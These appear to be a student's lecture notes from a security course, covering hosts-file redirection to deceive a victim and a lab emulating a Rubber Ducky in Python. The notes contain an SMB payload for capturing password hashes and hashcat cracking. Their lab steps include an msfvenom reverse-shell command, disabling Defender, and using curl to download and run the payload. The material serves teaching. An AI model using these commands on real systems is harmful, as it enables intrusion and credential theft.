gax1985/NSCC/Evolving Technologies/Lectures/Sept. 16th.md

 The host file should be changed to adapt to the victim.
 The pc when trying to reach a website checks the host file first before the DNS.

 Subdomain in the host file does nto have to be a login.
 Adapt it in style to the intended destination ( for the victim )

+## Exercise - Rubber  Ducky Emulation

+Why emulation

+● Rubber duckys are expensive
+● We can use python instead

+Results

+	whoami
+	desktop-user\beard
+	PS C:\Users\beard

+Getting Hashes

+>[!command]
+	# Payloads
+>	 shell = "powershell.exe"
+>	 payload = "net view \\\\192.168.42.82\\temp"

+Hashcat -m 2100

+### Instructions

+1. Create a Windows VM from scratch (Windows
+pro or education edition)
+2. Create a local admin user
+a.
+Turn off Defender AV
+3. Install Python onto the VM
+a.
+Add python to path
+4. Use msfvenom on Kali to make a
+windows/x64/shell_reverse_tcp exe payload

+	msfvenom -p windows/shell/reverse_tcp  -e x86/shikata_ga_nai LHOST=192.168.126.141 LPORT=12345 -f exe -o ~/REVERSE_SHELL.exe

+5. Use python on kali to host a web server
+6. Rewrite the ducky script to use curl to
+download the script to c:\Windows\Temp
+a. -o flag is useful
+b.
+Will need to run the run_payload function more
+than once
+c.
+Good to sleep a bit in between commands to
+ensure the payload is downloaded before
+running